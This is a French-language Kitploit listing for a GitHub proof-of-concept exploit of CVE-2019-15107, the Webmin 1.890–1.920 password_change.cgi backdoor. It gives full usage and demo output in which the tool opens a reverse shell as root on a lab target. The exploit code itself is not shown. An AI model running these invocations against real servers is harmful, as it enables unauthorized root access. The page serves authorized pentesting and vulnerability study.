Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2019-15107 — Proof-of-concept exploit for CVE-2019-15107 (Webmin <= 1.920) enabling unauthenticated RCE via command injection. | Kitploit
Outils/GitHubGitHub/adampawelczyk/cve-2019-15107
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubadampawelczyk/cve-2019-15107

cve-2019-15107

Proof-of-concept exploit for CVE-2019-15107 (Webmin <= 1.920) enabling unauthenticated RCE via command injection.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-15107 - Webmin RCE non authentifiée

Description

Ce dépôt contient une preuve de concept (PoC) de l'exploit pour CVE-2019-15107 affectant les versions de Webmin 1.890 à 1.920.

Le script exploite une porte dérobée dans les versions 1.890 à 1.920 qui permet à des utilisateurs non authentifiés d'injecter des commandes dans le point d'accès password_change.cgi via le paramètre old (dans la version 1.890 expired). Seuls les téléchargements SourceForge ont été compromis, mais ils sont répertoriés comme téléchargements officiels sur le site du projet.

Un ou des attaquants inconnus ont inséré des instructions Perl qx dans le code source du serveur de build à deux reprises : une fois en avril 2018, introduisant la porte dérobée dans la version 1.890, et en juillet 2018, réintroduisant la porte dérobée dans les versions 1.900 à 1.920.

Seule la version 1.890 est exploitable dans l'installation par défaut. Les versions ultérieures affectées nécessitent que la fonction de changement de mot de passe expiré soit activée.

Environnement testé

L'exploit a été testé avec succès contre :

  • Version de Webmin : 1.890
  • Système d'exploitation : Ubuntu 18.04.4 LTS

Utilisation

root@kitploit:~
python3 cve-2019-15107.py -r <TARGET_IP> -l <LOCAL_IP> [options]

options:
  -h, --help                 Affiche ce message d'aide et quitte
  -r, --rhost RHOST          Adresse IP de la cible
  -rp, --rport RPORT         Port de la cible (par défaut : 10000)
  -l, --lhost LHOST          IP locale pour le shell inverse
  -lp, --lport LPORT         Port local pour le shell inverse (par défaut : 4343)
  -s, --scheme {http,https}  Protocole à utiliser (par défaut : https)
  -x, --proxy [PROXY]        Utiliser un proxy (par défaut : http://127.0.0.1:8080)
  -f, --force                Forcer l'exploitation même si la détection échoue
  -c, --cmd CMD              Exécuter une seule commande au lieu du shell inverse

Exemple

root@kitploit:~
┌──(adam㉿kali)-[~]
└─$ python3 cve-2019-15107.py -r 10.114.159.93 -l 192.168.158.129

   _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
  / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
 | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
  \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  

  CVE-2019-15107 | Webmin Unauthenticated RCE
  by adampawelczyk

[*] Vérification de la vulnérabilité...
[*] Détection de la version cible...
[+] Webmin 1.890 détecté
[+] La cible est vulnérable
[*] Démarrage de l'écouteur sur le port 4343...
listening on [any] 4343 ...
[*] Envoi de la charge utile...
connect to [192.168.158.129] from (UNKNOWN) [10.114.159.93] 59970
bash: cannot set terminal process group (1314): Inappropriate ioctl for device
bash: no job control in this shell
root@source:/usr/share/webmin/# whoami
whoami
root
root@source:/usr/share/webmin/# 
root@kitploit:~
┌──(adam㉿kali)-[~]
└─$ python3 cve-2019-15107.py -r 10.114.159.93 -l 192.168.158.129 -c whoami                                                                                                                                                                 

   _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
  / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
 | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
  \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  

  CVE-2019-15107 | Webmin Unauthenticated RCE
  by adampawelczyk

[*] Vérification de la vulnérabilité...
[*] Détection de la version cible...
[+] Webmin 1.890 détecté
[+] La cible est vulnérable
[+] Sortie de la commande :
========================================
root

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2019-15107
  • https://webmin.com/security/
  • https://www.exploit-db.com/exploits/47230

Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Toute utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation de tester est illégale. Utilisez-le de manière responsable.

Télécharger l’outil